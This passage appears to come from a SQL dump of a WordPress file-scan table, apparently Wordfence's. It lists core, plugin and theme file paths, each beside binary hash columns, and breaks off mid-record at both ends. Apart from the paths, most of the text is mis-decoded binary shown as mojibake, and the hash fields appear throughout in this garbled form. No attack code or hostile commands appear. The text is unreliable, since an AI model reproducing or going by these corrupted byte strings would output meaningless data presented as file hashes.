W��@','Ѵ��Gj\\o���כU�ϝX-q����?\r#�','',0,'?'),('™�6F�ZK[��q�','wp-content/plugins/wordpress-seo/js/dist/languages/it.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��sF��m�S\n���\Z','Ѻ��$��!���e[��ᴤ��\n��]�','',0,'?'),('¡Hﲒ�xT7D','wp-content/plugins/wordpress-seo/admin/class-option-tabs.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��k�E��O#�힣b','�蛛��W�!;}��M��h5�����v�U뼈?','',0,'?'),('¯61�:a��E�\0AM','wp-includes/wp-includes/js/jquery/ui/menu.js',0,'��V7g����q�ʤ','��V7g����q�ʤ','O&����x�1�,m��Q�c��YE�#RG���','',0,'?'),('�1���|�}���dQ','wp-admin/export.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�r*�u��\Z^`S;V�','a�[%� �H�q�!ţ�~i��?a1�6�;q��','',0,'?'),('�t���~܌=�kƦ�','wp-includes/wp-includes/css/dist/nux/style.css',0,',�L��g�a�J\\',',�L��g�a�J\\','��)��v5i�B�:#��%����N�����','',0,'?'),('��z�Z�9ɟQ�56�','wp-includes/wp-includes/js/customize-preview.min.js',0,'�tQ��M�ʈ�����','�tQ��M�ʈ�����','��=��y�0��RAB�b����)�?=�n�','',0,'?'),('��)Gr:�8�q��','wp-includes/wp-includes/class-wp-comment-query.php',0,'d���!T0^ę��:�','d���!T0^ę��:�','�Q����M�����b?S��_c%��C1`A\0','',0,'?'),('��Z�@8p�r�!���','wp-content/plugins/wordpress-seo/src/generators/schema/article.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ƫ���*\'��žǘD<u','|j}B�N�j�1A�pm@���Z\'N����','',0,'?'),('��ށ�H��Û�\'O�+','wp-content/plugins/disable-gutenberg/uninstall.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�w�N��5\rVX�0�<&','����8~���YgN�$����ݠSG�3Q�','',0,'?'),('�鴴g�B���(d3�','wp-content/plugins/wordpress-seo/src/actions/importing/aioseo/aioseo-default-archive-settings-importing-action.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.�C�_�	^m�9Y\\�-','��^`uφ����EKCQL�9��X3WH�','',0,'?'),('���Π�7���D,�','wp-content/plugins/wordpress-seo/src/generators/twitter-image-generator.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��޾ُDn�0|���\'','\"F�؇0��M��]M�Ƃݖ�4�f0�B����]','',0,'?'),('�	1��А々�S:(','wp-includes/js/thickbox/loadingAnimation.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\"h\r�c���&�','B�F���`�F-��l�ڛ�RT6���Յ��','',0,'?'),('�\r�W$2lv9{ܭ:��','wp-includes/blocks/post-title/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�y�EI@\"�V\'���,�','Nk66v�\'/�b��j�7��/��j��','',0,'?'),('�w:k@D�i�WQ�','wp-content/plugins/wordfence/lib/wfModuleController.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��oI�Ʒk���b','7.ݰ̿���U���L>�\"�TM5�]��>�','',0,'?'),('���^R��,�D��QHm','wp-content/plugins/wordpress-seo/css/main-sitemap.xsl',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����&|m�8�)��','��m�\'��OH�	C@��H����	��̈�','',0,'?'),('����$cB�2r�?I�','wp-includes/wp-includes/js/tinymce/utils/validate.js',0,'CL�1?o+;���{Y�','CL�1?o+;���{Y�','k�H��;�\0�kC�s�	\'K�#45+eE|���0','',0,'?'),('�_WS����޲�$','wp-includes/js/dist/edit-site.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','F5�1���ex��g�','��1�\"�J����*�n<OC��Fqɐ���','',0,'?'),('���\Z�V���տ','wp-content/plugins/wp-cerber/cerber-maintenance.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��@�����ݦ��','O��䒚�a�uxVkbn��U����\\��','',0,'?'),('�)KbB��F�~�����','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/guzzle/src/HandlerStack.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�㛙�b��H���:�(','2Rm��){I֬�Ÿ4��툱��2��\r3?\n=','',0,'?'),('�T���!ة7�l��<','wp-includes/js/codemirror/htmlhint-kses.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��[��k[�#cLf{','�N��&�V\Z�A��/��R#~բ���_J*�Ї','',0,'?'),('�Z�P����L�\'�\0','wp-content/plugins/wordpress-seo/src/schema-templates/assets/icons.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��O�3y2Wc���','��/�r�%�����m�b�K��\'e�\\d+o�S��','',0,'?'),('�_���jSX�2�QQ=','wp-includes/ms-load.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}!��ݸ��%�0�ɰބ','��O�\Z[�t0�h�}�^E<ș�7��X�r�v','',0,'?'),('�`~|D%EH�wO����','wp-includes/sodium_compat/src/File.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\r����^�����\Z2','o%��E�sVFWW��M]b ��BX0.y�','',0,'?'),('�iHPC�|5U\0`�	r�H','wp-includes/wp-includes/js/dist/deprecated.js',0,'�B�v\"}	�H���}��T','�B�v\"}	�H���}��T','5\r�_��I��h�MJuk��Q�ͣ�չ���zn','',0,'?'),('ÂuJ�M�/� w�y','wp-includes/sodium_compat/lib/php72compat_const.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�p{��[��˔�	','�9�o���G�f�pmeG�#`�:Q�{`�','',0,'?'),('Å�.cxba���Bf�','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/promises/src/Create.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','٧��U���9���','B���Т�mɾ&�a��/V��,�§sSV�g��','',0,'?'),('ä��]0�`���AS:D','wp-includes/js/dist/blob.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2\'Vd� ���m:{C���','�\nk�\'�:�X�W	�z��es����<�_�','',0,'?'),('ç�?��<}��`C','wp-includes/wp-includes/js/dist/keycodes.js',0,'!a����	��5/ �','!a����	��5/ �','8*�Zu%V��,�3Yb���k־�&) ���E','',0,'?'),('èuT��^jP��6�','wp-includes/wp-includes/images/smilies/icon_confused.gif',0,'/#	�Ӣww$x꾓Y','/#	�Ӣww$x꾓Y','U0�\\L�X��fXƦ�G\0�T���$a�5U�B�','',0,'?'),('éR�%��ӚZ#+�\"','wp-includes/wp-includes/js/dist/media-utils.js',0,'��3)PvLiJO�|��','��3)PvLiJO�|��','�c��BD����ҕ���2+��k�`1<��*�w�˕','',0,'?'),('ö�PAZ���4���g','wp-content/themes/hitmag/inc/customizer/assets/imgs/1c.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�/��;�M=����YY','L�NF��/Ua���P�ۈ.����E�r���','',0,'?'),('ö���6Jy�:���','wp-content/themes/hitmag/inc/kirki/modules/webfonts/webfont-files.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0���7�z��2��0��','��1VI��*h![t��=�g@�yE��HD�S����','',0,'?'),('ü�{V+�ϷH�֖','wp-includes/wp-includes/class-wp-text-diff-renderer-table.php',0,'�-�����g0HFuI�','�-�����g0HFuI�','�_h+�U��H�i��_��e�	w����6��','',0,'?'),('ý��P��7&ݣ`�)','wp-includes/sodium_compat/autoload.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o���u�\r���*B.�7','O�Bѡ�E��J�>q�����&h��0�6\"��<','',0,'?'),('�Ĩ�|�������','wp-content/plugins/redirection/locale/json/redirection-fr_CA.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���yB=�� �*��','l]�3\"Bm��9��af���m�,�}\r�`<qC','',0,'?'),('��tnR�ؔ����%^�','wp-admin/images/align-right.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','B���Oe#�l@:P+\"v','�ɳ���C��?�=���&��UyZ�31��!<c','',0,'?'),('���D����=^�%8�d','wp-content/plugins/wordpress-seo/js/dist/select2/i18n/pt.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�7���L ���C̃Yv','n�\"���e�L���g��[&�C��p~��O�9J','',0,'?'),('���H+֧r�Yv	%�','wp-content/plugins/wordpress-seo/src/integrations/admin/fix-news-dependencies-integration.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',#H�r�SX���l=�','y|4X:�V�@�}��K��lv�{w=�JHY,��','',0,'?'),('���5�V\"�$$�_��','wp-admin/includes/post.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�� ]�a�&�i���-/','�R�Ô��c�p\"/�|HJ��ĩ&�t���C��','',0,'?'),('��%�x#B�9ܳ�?�y�','wp-includes/wp-includes/images/smilies/icon_cry.gif',0,'�+`Ůd�W]�����h','�+`Ůd�W]�����h','[�<�q�wf�)�rZ�(���=#;ans���w9','',0,'?'),('��4�l!�r��؄���','wp-includes/class-wp-block-type-registry.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�39�55Q�e\r�|K\"�','���?���\0���V/�St���ʺ|��OH]','',0,'?'),('��:\0�p(m�Cm!�)Z','wp-content/plugins/wordpress-seo/src/deprecated/src/actions/indexation/indexable-general-indexation-action.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','FE�\r^��{���Л�O','b��t�0�(��=6<-�o9���?;r��\n)�r�','',0,'?'),('��iY����\0\nR)��','wp-includes/post-thumbnail-template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���M��;S��D/�','�yya\r#�NG�5�e�E�TZyE��h����l','',0,'?'),('��u�X�ݼ#�-���','wp-includes/class-wp-http-ixr-client.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4����5�eTֹ���','F��@��I�і%4�]��a�ks<Pk�k','',0,'?'),('��*n�;A�LXI@�g','wp-content/plugins/wordpress-seo/js/dist/select2/i18n/ko.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q���[�s��>���O','AZ�Jn�ؾ�\04?uH��<�;� e��6','',0,'?'),('�\0U�����aS��','wp-includes/widgets/class-wp-widget-block.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','k��m�zb\Z,�_O�','�K˽\r�nR���WD��4�@�;�3NA��.','',0,'?'),('�cᘣ�r��w��','wp-includes/blocks/file/view.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�-m� �t��!o��','��YX.>��t;a]_�n�ʣ8i��\\-|�','',0,'?'),('�\n�����-c�@h��','wp-content/plugins/wp-smushit/app/assets/images/graphic-smush-cdn-default.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ŤF�u���1�','r���%^��4�g�\Z���s��<6KD�S^�','',0,'?'),('�\n�kxM�a;�,�0','wp-content/plugins/wp-cerber/assets/flags/mg.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','yUyRO�F�(V��R','�1v��% !$E٭��X����˅�}','',0,'?'),('�8�d$�nx���yŚ','wp-includes/blocks/navigation-submenu/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�n�C�ow�Z�q����','���8�m�����7�}��t�y�J���l','',0,'?'),('�\Z�-�/�x8g�G�9�','wp-content/plugins/wordpress-seo/src/schema-templates/recipe-description.schema.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����2�3V8� �?G','r�v�p����ፑt�I�zg��\0�LD���','',0,'?'),('��5Ĩ)�0��X�\'�','wp-admin/widgets-form-blocks.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9+w�ao��!�ʑ8','zAؘ�u���v���Mʀ���*���W�3	','',0,'?'),('�#C��v�nОKvz��','wp-content/plugins/wp-cerber/assets/icons/fonts/crb.ttf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\r����R�EB','���/\Z�\0Sam\'���ϫ�k!f��5�\rM�','',0,'?'),('�3k<R6�����֔z�','wp-content/plugins/wordpress-seo/src/presenters/twitter/image-presenter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','مB&��W��w�s|��','�:�5�[%��sS�[o�������C%\"%\n1lx','',0,'?'),('�G���\Z0���|��','wp-includes/wp-includes/class-wp-block-type.php',0,'�<Aj�Q�~$���~��','�<Aj�Q�~$���~��','��\\)�dw(?o���1�i�n�@�~KU6���Z','',0,'?'),('�`�,}��D��@','wp-includes/class-wp-recovery-mode.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9�2�o��m&��I�','k\nY��#I����p\0�y���0=W�Mm�o�','',0,'?'),('�pȬ�ES����0�K','wp-includes/blocks/search/theme.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�w-ͺ��axX�8.','Z�ϭn��ܠ�43�wƶ~آ�L��S�{N','',0,'?'),('�v�V/W��{}!^�N','wp-includes/blocks/html/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Z�?�9M}m�%�T��','�N����]F��3p�<6���@w�%<};�','',0,'?'),('�y���x�Q3�p3�','wp-includes/wp-includes/js/dist/wordcount.min.js',0,'Ǣ�6Ӯ����H�pL','Ǣ�6Ӯ����H�pL','��A+l:#I�-A��5�J�iQ��ڙRW�w\0r�','',0,'?'),('�~;$(����pXz�','wp-includes/blocks/comments/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$����?y4���]','�-�.���\0<\0��0����W��vA_�Y �','',0,'?'),('Ć~�7c���Ʊ�ۃG','wp-content/plugins/wp-cerber/languages/wp-cerber-lt_LT.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%��:rל�ZL]���','��qA$%Re��$��e���`!�e:|��PB;�','',0,'?'),('Ĉ^A��+l���o�d��','wp-includes/js/tinymce/skins/wordpress/images/audio.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7~!���\0����\"w','�g��z���.g�V�:��[����Й�H)Ȟ�','',0,'?'),('đ�ԪV�CT����G','wp-content/plugins/wordpress-seo/admin/pages/licenses.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�0�F������n|hD','3��&��Sb�K����A\' xP?d�&O��w','',0,'?'),('ĔԼ���pP�Z	H��','wp-includes/images/smilies/icon_cry.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�+`Ůd�W]�����h','[�<�q�wf�)�rZ�(���=#;ans���w9','',0,'?'),('ě�w��+�qAZ','wp-includes/blocks/group/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��r&*�r>�d6� Yu9','N���}2��ƟN�\n��aӮ�����@~��','',0,'?'),('ğ\\�x*�=�	�.�V','wp-content/plugins/wordpress-seo/vendor_prefixed/league/oauth2-client/src/Tool/BearerAuthorizationTrait.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��9�TaC��I�;@','y�Hx�d?���OWfGf̶X��e~m5����f`�','',0,'?'),('ijJ�\n`|�5,HT��','wp-admin/includes/admin-filters.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(�c�\"i�~V�Zx\n!3�',' �u�h2�w��Ŏ�}��y�Dʬ��.��|�','',0,'?'),('Ķ�Ɩ�o���èf{U','wp-includes/js/jquery/ui/effect-highlight.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���9A4�dS��M\'e�','N��pp2��1}�����Ngo���V�Z�5','',0,'?'),('��e��N-��@1\Z��','wp-includes/blocks/legacy-widget/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�x�v�^E�E�A','�}2��k\0���h�dz!u��5��ޭgd�c�','',0,'?'),('�Ѻɩ��uy����}','wp-includes/sodium_compat/src/Core/Salsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���b5lJ�#���v','c=0�-#�-T�S�X�&��4����\0�K8\r�','',0,'?'),('��׭�Ď������','wp-content/plugins/wordpress-seo/src/deprecated/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','EЛ��O0��c���Ag3','��	蚠{�c�FJ�w��!}a���9�','',0,'?'),('��ʙ\0}��甠K��.�','wp-includes/js/jquery/jquery.color.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��!4;ַ�¢1�','���}�+�!9\'�^-�-0�!��\Zr~h���A9','',0,'?'),('��\r�E^[�7kg(��','wp-content/plugins/wordpress-seo/js/dist/select2/i18n/mk.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+�.�hhk|*\n�H��','�\r�塠T`0b=	�z�@���F\\dX�)��m','',0,'?'),('���Єj[�\'P�`�y','wp-includes/css/dist/block-editor/default-editor-styles-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��7�䆜�~h�?��','�|DŽ�\Z��D�~�X���E���)>��2�,','',0,'?'),('��{A��mm��*�K','wp-includes/nav-menu-template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{J�/�7�}B��v�e6','�5+�4�˚���N4�6m_J�Y��~��','',0,'?'),('�j�b�Hvn�sB','wp-content/themes/hitmag/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�.��P\Zd㨡�M���\"','��=��w����1_\"���>\n1�U�-�j��','',0,'?'),('����T���m�','wp-content/plugins/wp-cerber/assets/flags/eh.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���\'���l��	��','6�7R�g\ZJ��n�B󡀮>6��*�?�C��','',0,'?'),('�!I�||KM�k�(	O�','wp-content/plugins/wordpress-seo/images/profile-social-fields.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|�%��ѤJ�()\0�f�','��?K�\'*!��vG�z��]�B&Їu��','',0,'?'),('�uy(e_�X�\0�6','wp-includes/wp-includes/js/media-views.min.js',0,'�J虝���\n�G{5�','�J虝���\n�G{5�','�7�ϝ���P9n)%�-�i�Qԭv���kJ���','',0,'?'),('�D���C����F}��','wp-includes/Requests/Exception/HTTP/418.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','83�9k\\8\'i�v��','4 �6鎬��M&�$!�2d<��\\	|\\�?g�\n','',0,'?'),('�T��V�6���D���g','wp-content/plugins/wordpress-seo/admin/menu/class-admin-menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','qX%�:��to����k�','܉D��FNd�N�x]�~%9��7��n�\'','',0,'?'),('�_�n�����p���aV','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/HChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>*L�1�˵�\"k%F�+','Z��i�M�f�U�v�i-�})��f�\"��Mnd?X','',0,'?'),('�`#��G�b�C��֊�','wp-includes/js/swfupload/handlers.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j��ڙK�~q	����c=','�T򌿑�d�T�y~#��jI\"�+�+3�ɉ','',0,'?'),('�xeju������','wp-includes/css/dist/edit-widgets/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����y���6��','��sed��3���z)�����Wޫ��דv=','',0,'?'),('�~s�5խ�?([�Ҹ�','wp-includes/wp-includes/class.wp-scripts.php',0,'��s�zrU[\nK��z��','��s�zrU[\nK��z��','s�d����� J�WL�+<�I���S4y$)T@','',0,'?'),('�~�H�����c','wp-content/plugins/redirection/database/schema/201.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����Zղ�Z�I}C','���Tȍ�~���)�yr������b�','',0,'?'),('łj�Dߋ�.�˖D��','wp-admin/css/forms.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�~�e�����rT���','��E,e_\rQ�m�ns�En�8�Ѱ����Q','',0,'?'),('ņ�ԡyi�D�1�','wp-includes/blocks/embed/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�M�D�O�.g�9��','Jң�,�k�ޗ�\"w˕Ԡ�>�Νl�$�E_��)','',0,'?'),('ň��Ȍ��w�H��\"','wp-content/plugins/wordfence/css/license/premium.1647958122.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���A���]�UQ��甝','�-{)f��\n� �:�}��F��3j*����c%','',0,'?'),('Ŋ��6���@�L(`��','wp-content/plugins/wordfence/views/scanner/site-cleaning.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\�!ߴ_�&x�h��G','l�t��!�o�V�L��`͂eܶ�<��`�','',0,'?'),('Ő�5]��dxv�:�','wp-includes/blocks/pullquote/theme-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']o���a��!\'�','OJg�I}Ol\n4?k�a���W�K�!o��Q���','',0,'?'),('ŕ�y�n�\\��zL�ʨ','wp-includes/wp-includes/class-wp-http-curl.php',0,'�S�`3F�O�,;N#���','�S�`3F�O�,;N#���','��@�� ����T��(�\nD�ڠ��Y��	�]�2','',0,'?'),('Ŝ�\0�>j�-������','wp-includes/blocks/latest-comments/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','琌U�~�P��(�k','V�3=%��kO�[3��Nf3��S�0v�ڦ','',0,'?'),('ų\\����?��\\\'�','wp-content/plugins/all-in-one-wp-security-and-firewall/css/wp-security-notices.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����k�Z��e��O��','b��y���c�{@׷p��v�e�DFʷ5����','',0,'?'),('ŷk�,Q��\"�K*��>','wp-content/plugins/wordpress-seo/admin/class-paper-presenter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ؖ�y�ќ��b�','�w?�W~���_=���n�X���iO<,���','',0,'?'),('��-�p�lE���k�/�','wp-includes/js/jquery/jquery.hotkeys.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�S!}EU�\\b�g�h��=','\ZJ��]�x ծT���c�0n�9  +V�k�','',0,'?'),('��U���E~���-�`','wp-content/plugins/wordpress-seo/js/dist/externals/searchMetadataPreviews.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o�Nk<�xGȫ��J','>p�6��č�r���Vi?��{��Y�KddPW','',0,'?'),('��� #�H�7&!��','wp-content/plugins/wordfence/js/wfdropdown.1647958122.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����rp��c\'\Z�','��SG��s8;�Z�!�זJ�u�1�z?���','',0,'?'),('�ZTD�\r�[��FcLL�','wp-includes/blocks/gallery/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����:~s��','�e5%d��|x~^��-�譹����\'}Y\\','',0,'?'),('�#6��n!����S','wp-includes/wp-includes/js/dist/vendor/wp-polyfill-url.js',0,'�>d�KP\'IC��3��8','�>d�KP\'IC��3��8','�k��z��:�_sDp�xe%J�	���ST�_','',0,'?'),('����c�$Jm-�8�','wp-includes/wp-includes/js/dist/keyboard-shortcuts.js',0,'w�\ZH����%3kGUE','w�\ZH����%3kGUE','\"�����8��	�鎸\'��o83�J���w���','',0,'?'),('�Rx�M�J�=����','wp-includes/wp-includes/css/dist/editor/style-rtl.min.css',0,'_O7b/��T���m�','_O7b/��T���m�','_w��^���p�{�,ǣ��{}�:�\0���2�','',0,'?'),('�	��#A�\n#b#��=','wp-includes/js/tinymce/themes/inlite/theme.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Z=\ro<3��E���','�\"�;l��\0s\'�lB�3q�6)�8�\n@D����','',0,'?'),('��p�1	�?��J@�','wp-content/plugins/wordfence/vendor/composer/ca-bundle/res/cacert.pem',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����ǧn3Q�2�G�','�d��\"fݎ���6em�`�z����P<KO�','',0,'?'),('�+���g���q6�^\0�','wp-admin/images/wheel.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E0� q0m��\ZY%V�X�','(]�:=d�qۅ�O{9�€Ԁ�v��Ș~����','',0,'?'),('�+�kZ@�bK��Қ��','wp-includes/blocks/block/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0�^���(�-4���','�ߩ�\"s|[�v���ӑ{�o`Y��U���','',0,'?'),('�@��:<�o|J-e�','wp-content/plugins/wordfence/images/wf-error-badge.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�EQt��s	�Mz�y���','��殙F��`�a�݀�k���mE�Q��+~��','',0,'?'),('�N���DС���A���','wp-content/plugins/wp-fastest-cache/languages/wp-fastest-cache-fa_IR.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','᧖͎@5ZO�,�\0�','��!4\r+�d�&�BF�_�3��qͫ�,o�','',0,'?'),('�X\rNΌ\"&���5G�N','wp-content/plugins/wordpress-seo/src/exceptions/indexable/post-not-found-exception.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�6��]�F����e','�TԾ;�������6���7M6X���S','',0,'?'),('�dt���S0�[\\Og:','wp-content/plugins/wordfence/modules/login-security/views/.htaccess',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���A�a�b�vr�','C����\'r�9��@�K�ކt�����w#@k�','',0,'?'),('�h�(ٲ�&b��\\ek','wp-content/plugins/wordpress-seo/src/presenters/abstract-presenter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.�E	�����\Z��(�','�4&\\<���##Q�ٕ�o�F����k|��x','',0,'?'),('�iK$�|:3�	�?z�','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/guzzle/src/Exception/ConnectException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���mt8E���{�-','���	P�&�X��ϒ�*7kUΑ���^0��','',0,'?'),('�q�&]&�=���m�','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/guzzle/src/Handler/EasyHandle.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ˡ+�aD[>vŝr�','E�5 }>�L��$.L�,�3D0�����M','',0,'?'),('ƅ����|_�i/y��	','wp-includes/js/tinymce/plugins/media/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6�\'1�Z����f ','\n�>����EQ�i�漺��k�}î�Dz������','',0,'?'),('Ƈ����]�Ĭ�ޘ�','wp-content/plugins/wordpress-seo/admin/interface-collection.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��/�8sr�%�,��#��','t_<�M�����,to~�f�Y�c׮���2(j�','',0,'?'),('ƎJ*�F)�KV��6','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/psr7/src/functions_include.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=y�;+�\0��m~�\0��','փ��J�\r/��][orrB}2V��E섚�','',0,'?'),('Ət���\Z��o+��ش','wp-includes/blocks/spacer/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s�k���k�3z��U)�','u2�T��z\"����-g���&]�V�j��$O>�','',0,'?'),('Ƒ�Y�CrJr����','wp-content/plugins/wordpress-seo/src/integrations/blocks/breadcrumbs-block.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':jQ�ɋD[��t�','�[e��\n�vk�8P1O�.��C�����{��','',0,'?'),('Ʃ襖5!�F:��N�','wp-content/plugins/wordfence/css/wf-roboto-font.1647958122.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��]���O�uݵ�','�+�hJ~�ʆ��*��a*���Gb67�\r�:�','',0,'?'),('Ƭ+\Z���I�d^i <\0','wp-includes/js/jquery/suggest.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':$tV�E�ʿ���','r�,K�pŗrq^b�\\��=rZ�]��6�+','',0,'?'),('Ƭ��SX���Z���3�','wp-includes/js/dist/plugins.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','B5�!!I(@�\r�J)\0�',':4C�VV,�ߎz9�.������\0�w�H��P�','',0,'?'),('Ƽ����~9��~籌�','wp-content/plugins/wordpress-seo/inc/wpseo-non-ajax-functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��r��@g����','vG>YV�^��Y?;M�`�@�QƂ��0�W�\"','',0,'?'),('����;Vޯ���n�Ty ','wp-includes/class-wp-theme-json-resolver.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��9��32?!Қ���','��\"2t<\\!��ɳ��>�/+��6�0�<�ozv','',0,'?'),('��g��v�.َ����K','wp-content/plugins/wordpress-seo/js/dist/help-scout-beacon.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Hs���+�	5*�0YN�','k�6;b��eV\n��s����L ��ׅp��Gu�','',0,'?'),('��	